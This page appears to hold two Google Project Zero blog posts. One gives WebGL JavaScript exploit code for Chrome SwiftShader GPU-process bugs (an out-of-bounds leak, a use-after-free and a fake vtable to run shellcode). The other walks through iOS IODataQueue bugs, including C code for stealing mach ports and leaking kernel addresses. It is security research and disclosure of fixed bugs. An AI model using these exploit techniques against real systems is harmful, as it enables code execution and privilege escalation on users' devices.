Pages

Wednesday, October 24, 2018

Heap Feng Shader: Exploiting SwiftShader in Chrome

Posted by Mark Brand, Google Project Zero

On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.

SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.

It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fallback to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.

Previous precision problems


So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read()is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation will happen at the first line marked in bold, and the out-of-bounds access happens at the second).

function issue_1584(gl) {
 const src_width  = 0x2000;
 const src_height = 0x16c4;

 // we use a texture for the source, since this will be allocated directly
 // when we call glTexImage2D.

 this.src_fb = gl.createFramebuffer();
 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

 let src_data = new Uint8Array(src_width * src_height * 4);
 for (var i = 0; i < src_data.length; ++i) {
   src_data[i] = 0x41;
 }

 let src_tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_2D, src_tex);
 gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
 gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);

 this.read = function() {
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

   const dst_width  = 0x2000;
   const dst_height = 0x1fc4;

   dst_fb = gl.createFramebuffer();
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   let dst_rb = gl.createRenderbuffer();
   gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
   gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
   gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   // trigger
   gl.blitFramebuffer(0, 0, src_width, src_height,
                      0, 0, dst_width, dst_height,
                      gl.COLOR_BUFFER_BIT, gl.NEAREST);

   // copy the out of bounds data back to javascript
   var leak_data = new Uint8Array(dst_width * 8);
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
   gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
   return leak_data.buffer;
 }

 return this;
}

This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.

And a second bug


Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.

So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!

This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.

However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.

The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (the first bold section) will cause 4 allocations of size 0xf0 when the program object is linked, and the second bold section is where the original object will be free’d and replaced by a shader uniform object.

function issue_1585(gl, fake) {
 let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
 gl.shaderSource(vertex_shader, `
   attribute vec4 position;
   uniform int block0[60];
   uniform int block1[60];
   uniform int block2[60];
   uniform int block3[60];

   void main() {
     gl_Position = position;
     gl_Position.x += float(block0[0]);
     gl_Position.x += float(block1[0]);
     gl_Position.x += float(block2[0]);
     gl_Position.x += float(block3[0]);
   }`);
 gl.compileShader(vertex_shader);

 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
 gl.shaderSource(fragment_shader, `
   void main() {
     gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
   }`);
 gl.compileShader(fragment_shader);

 this.program = gl.createProgram();
 gl.attachShader(this.program, vertex_shader);
 gl.attachShader(this.program, fragment_shader);

 const uaf_width = 8190;
 const uaf_height = 8190;

 this.fb = gl.createFramebuffer();
 uaf_rb = gl.createRenderbuffer();

 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
 gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
 gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
 gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

 let tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
 // trigger
 for (i = 2; i < 0x10; ++i) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 function unroll(gl) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
   // snip ...
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 for (i = 0x10; i < 0x100000000; i += 0x10) {
   unroll(gl);
 }

 // the egl::ImageImplementation for the rendertarget of uaf_rb is now 0, so
 // this call will free it, leaving a dangling reference
 gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

 // replace the allocation with our shader uniform.
 gl.linkProgram(this.program);
 gl.useProgram(this.program);

 function wait(ms) {
   var start = Date.now(),
   now = start;
   while (now - start < ms) {
     now = Date.now();
   }
 }

 function read(uaf, index) {
   wait(200);
   var read_data = new Int32Array(60);
   for (var i = 0; i < 60; ++i) {
     read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
   }
   return read_data.buffer;
 }

 function write(uaf, index, buffer) {
   gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
   wait(200);
 }

 this.read = function() {
   return read(this, this.index);
 }

 this.write = function(buffer) {
   return write(this, this.index, buffer);
 }

 for (var i = 0; i < 4; ++i) {
   write(this, i, fake.buffer);
 }

 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));
 for (var i = 0; i < 4; ++i) {
   data = new DataView(read(this, i));
   for (var j = 0; j < 0xf0; ++j) {
     if (fake.getUint8(j) != data.getUint8(j)) {
       log('uaf block index is ' + i.toString());
       this.index = i;
       return this;
     }
   }
 }
}

At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.

Now, it should be fairly trivial to get arbitrary code execution from this point, although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.

SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?

We can - so by creating a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode

When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.

Conclusions

It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.

In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.

Thursday, October 18, 2018

Deja-XNU

Posted by Ian Beer, Google Project Zero

This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.

State of the art
An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

So let's turn back the clock to 2014...

Pangu 7
On June 23 2014 @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461 which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.

(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)

Queuerious...
Looking at the iOS 8-era release notes you'll see that Pangu and I had found some bugs in similar areas:

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.

CVE-2014-4418 : Ian Beer of Google Project Zero

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.

CVE-2014-4388 : @PanguTeam

  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.

CVE-2014-4389 : Ian Beer of Google Project Zero

IODataQueue
I had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.

IODataQueue was quite simple, there were only two fields: dataQueue and notifyMsg:

class IODataQueue : public OSObject
{
 OSDeclareDefaultStructors(IODataQueue)
protected:
 IODataQueueMemory * dataQueue;
 void * notifyMsg;
public:
 static IODataQueue *withCapacity(UInt32 size);
 static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);
 virtual Boolean initWithCapacity(UInt32 size);
 virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);
 virtual Boolean enqueue(void *data, UInt32 dataSize);
 virtual void setNotificationPort(mach_port_t port);
 virtual IOMemoryDescriptor *getMemoryDescriptor();
};

Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:

OSDefineMetaClassAndStructors(IODataQueue, OSObject)

IODataQueue *IODataQueue::withCapacity(UInt32 size)
{
   IODataQueue *dataQueue = new IODataQueue;

   if (dataQueue) {
       if (!dataQueue->initWithCapacity(size)) {
           dataQueue->release();
           dataQueue = 0;
       }
   }

   return dataQueue;
}

IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize)
{
   IODataQueue *dataQueue = new IODataQueue;

   if (dataQueue) {
       if (!dataQueue->initWithEntries(numEntries, entrySize)) {
           dataQueue->release();
           dataQueue = 0;
       }
   }

   return dataQueue;
}

Boolean IODataQueue::initWithCapacity(UInt32 size)
{
   vm_size_t allocSize = 0;

   if (!super::init()) {
       return false;
   }

   allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);

   if (allocSize < size) {
       return false;
   }

   dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);
   if (dataQueue == 0) {
       return false;
   }

   dataQueue->queueSize    = size;
   dataQueue->head         = 0;
   dataQueue->tail         = 0;

   return true;
}

Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize)
{
   return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));
}

void IODataQueue::free()
{
   if (dataQueue) {
       IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));
   }

   super::free();

   return;
}

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
   const UInt32       head = dataQueue->head;  // volatile
   const UInt32       tail = dataQueue->tail;
   const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
   IODataQueueEntry * entry;

   if ( tail >= head )
   {
       // Is there enough room at the end for the entry?
       if ( (tail + entrySize) <= dataQueue->queueSize )
       {
           entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

           entry->size = dataSize;
           memcpy(&entry->data, data, dataSize);

           // The tail can be out of bound when the size of the new entry
           // exactly matches the available space at the end of the queue.
           // The tail can range from 0 to dataQueue->queueSize inclusive.

           dataQueue->tail += entrySize;
       }
       else if ( head > entrySize ) // Is there enough room at the beginning?
       {
           // Wrap around to the beginning, but do not allow the tail to catch
           // up to the head.

           dataQueue->queue->size = dataSize;

           // We need to make sure that there is enough room to set the size before
           // doing this. The user client checks for this and will look for the size
           // at the beginning if there isn't room for it at the end.

           if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )
           {
               ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;
           }

           memcpy(&dataQueue->queue->data, data, dataSize);
           dataQueue->tail = entrySize;
       }
       else
       {
           return false; // queue is full
       }
   }
   else
   {
       // Do not allow the tail to catch up to the head when the queue is full.
       // That's why the comparison uses a '>' rather than '>='.

       if ( (head - tail) > entrySize )
       {
           entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

           entry->size = dataSize;
           memcpy(&entry->data, data, dataSize);
           dataQueue->tail += entrySize;
       }
       else
       {
           return false; // queue is full
       }
   }

   // Send notification (via mach message) that data is available.

   if ( ( head == tail )                /* queue was empty prior to enqueue() */
   || ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */
   {
       sendDataAvailableNotification();
   }

   return true;
}

void IODataQueue::setNotificationPort(mach_port_t port)
{
   static struct _notifyMsg init_msg = { {
       MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
       sizeof (struct _notifyMsg),
       MACH_PORT_NULL,
       MACH_PORT_NULL,
       0,
       0
   } };

   if (notifyMsg == 0) {
       notifyMsg = IOMalloc(sizeof(struct _notifyMsg));
   }

   *((struct _notifyMsg *)notifyMsg) = init_msg;

   ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;
}

void IODataQueue::sendDataAvailableNotification()
{
   kern_return_t kr;
   mach_msg_header_t * msgh;

   msgh = (mach_msg_header_t *)notifyMsg;
   if (msgh && msgh->msgh_remote_port) {
       kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);
       switch(kr) {
           case MACH_SEND_TIMED_OUT: // Notification already sent
           case MACH_MSG_SUCCESS:
               break;
           default:
               IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n", /*getName()*/"IODataQueue", kr);
               break;
       }
   }
}

IOMemoryDescriptor *IODataQueue::getMemoryDescriptor()
{
   IOMemoryDescriptor *descriptor = 0;

   if (dataQueue != 0) {
       descriptor = IOMemoryDescriptor::withAddress(dataQueue, dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE, kIODirectionOutIn);
   }

   return descriptor;
}

The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:

typedef struct _IODataQueueMemory {
   UInt32            queueSize;
   volatile UInt32   head;
   volatile UInt32   tail;
   IODataQueueEntry  queue[1];
} IODataQueueMemory;

The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.

The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.

Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.

IODataQueue.cpp was 243 lines, including license and comments. I count at least 6 bugs, which I've highlighted in the code. There's only one integer overflow check but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place where the IODataQueue was storing the queue's length was in the shared memory which userspace could modify.

This lead to obvious memory corruption issues in ::enqueue since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: The ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all however is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code which was using the IODataQueue allowed userspace to get multiple memory descriptors this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.

Back to Pangu
Pangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."

IOSharedDataQueue adds one (unused) field:

   struct ExpansionData {
   };
   /*! @var reserved
       Reserved for future use.  (Internal use only) */
   ExpansionData * _reserved;


IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.

::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:

Boolean IOSharedDataQueue::initWithCapacity(UInt32 size)
{
   IODataQueueAppendix *   appendix;
   
   if (!super::init()) {
       return false;
   }
   
   dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE), PAGE_SIZE);
   if (dataQueue == 0) {
       return false;
   }

   dataQueue->queueSize = size;
   dataQueue->head = 0;
   dataQueue->tail = 0;
   
   appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size + DATA_QUEUE_MEMORY_HEADER_SIZE);
   appendix->version = 0;
   notifyMsg = &(appendix->msgh);
   setNotificationPort(MACH_PORT_NULL);

   return true;
}

IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:

typedef struct _IODataQueueAppendix {
   UInt32 version;
   mach_msg_header_t msgh;
} IODataQueueAppendix;

This contains a version field and, strangely, a mach message header. Then on this line:

 notifyMsg = &(appendix->msgh);

the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.

Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory, because clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18 byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory constrained device with no swap, I could imagine there was a big drive to save memory.

But the question is: can you put a mach message header in shared memory like that?

What's in a message?
Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:

typedef struct
{
 mach_msg_bits_t  msgh_bits;
 mach_msg_size_t  msgh_size;
 mach_port_t      msgh_remote_port;
 mach_port_t      msgh_local_port;
 mach_msg_size_t  msgh_reserved;
 mach_msg_id_t    msgh_id;
} mach_msg_header_t;

(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)

Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:

userspace:
typedef __darwin_mach_port_t mach_port_t;
typedef __darwin_mach_port_name_t __darwin_mach_port_t;
typedef __darwin_natural_t __darwin_mach_port_name_t;
typedef unsigned int __darwin_natural_t

kernel:
typedef ipc_port_t mach_port_t;
typedef struct ipc_port *ipc_port_t;

In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.

Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!

Fast-forward
Before we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.

I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.

Userspace queues and deja-xnu
This summer while looking for variants of the old IODataQueue issues I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeue objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.

The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.

There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on MacOS. You can talk to this service from inside the app sandbox on iOS.

Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.

Reading more of the userspace IODataQueue handling code I noticed that unlike the kernel IODataQueue object, the userspace one had an appendix as well as header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:

IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort)
{
   IODataQueueAppendix * appendix = NULL;
   UInt32 queueSize = 0;
           
   if ( !dataQueue )
       return kIOReturnBadArgument;
       
   queueSize = dataQueue->queueSize;
   
   appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE);

   appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
   appendix->msgh.msgh_size        = sizeof(appendix->msgh);
   appendix->msgh.msgh_remote_port = notifyPort;
   appendix->msgh.msgh_local_port  = MACH_PORT_NULL;
   appendix->msgh.msgh_id          = 0;

   return kIOReturnSuccess;
}

We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!

Exploitation of an arbitrary mach message send
In XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)

As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1 if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.

Interestingly process startup on iOS is sufficiently deterministic that in backboardd on iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.

Stealing ports
The msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory which will be sent to us to set the msgh_local_port field to 0x407 (backboardd's name for a thread port) and the msgh_bits field to use a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!

This exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.

Back to 2014
I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.

Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.

We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?

Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.

Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!

Determining port addresses
IOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.

The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:

uint32_t remote_matching =
 task_remote_call(bbd_task_port,
                  IOServiceMatching,
                  1,
                  REMOTE_CSTRING("IOHIDEventService"));
 
uint32_t remote_service =
 task_remote_call(bbd_task_port,
                  IOServiceGetMatchingService,
                  2,
                  REMOTE_LITERAL(0),
                  REMOTE_LITERAL(remote_matching));
 
uint32_t remote_conn = 0;
uint32_t remote_err =
 task_remote_call(bbd_task_port,
                  IOServiceOpen,
                  4,
                  REMOTE_LITERAL(remote_service),
                  REMOTE_LITERAL(0x1307), // remote mach_task_self()
                  REMOTE_LITERAL(0),
                  REMOTE_OUT_BUFFER(&remote_conn,
                                    sizeof(remote_conn)));
 
mach_port_t conn =
 pull_remote_port(bbd_task_port,
                  remote_conn,
                  MACH_MSG_TYPE_COPY_SEND);

We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:

vm_address_t qaddr = 0;
vm_size_t qsize = 0;

IOConnectMapMemory(conn,
                  0,
                  mach_task_self(),
                  &qaddr,
                  &qsize,
                  1);

mach_msg_header_t* shm_msg =
 (mach_msg_header_t*)(qaddr + qsize - 0x18);

In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:

mach_port_t notification_port = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(),
                  MACH_PORT_RIGHT_RECEIVE,
                  &notification_port);

uint64_t ref[8] = {0};
IOConnectSetNotificationPort(conn,
                            0,
                            notification_port,
                            ref);

We can then see the kernel address of that port's ipc_port in the shared memory message:

+0x00001010 00000013  // msgh_bits
+0x00001014 00000018  // msgh_size
+0x00001018 99a3e310  // msgh_remote_port
+0x0000101c 00000000  // msgh_local_port
+0x00001020 00000000  // msgh_reserved
+0x00001024 00000000  // msgh_id


We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:

IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right

This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_conenct_set_notification_port client code. Let's take a look in device.defs which is the source file used by MIG to generate the RPC stubs for IOKit:

routine io_connect_set_notification_port(
   connection        : io_connect_t;
in notification_type : uint32_t;
in port              : mach_port_make_send_t;
in reference         : uint32_t);

Here we can see that the port argument is defined as a mach_port_make_send_t which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach there is no way for the receiver to determine whether the sender held a receive right for a send right which you received or instead sent you a copy via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.

Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:

host port: 0x8e30cee0

Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:

master port: 0x8e30c690
host port: 0x8e30cee0
GCF(0x690, 0xee0) = 0x70

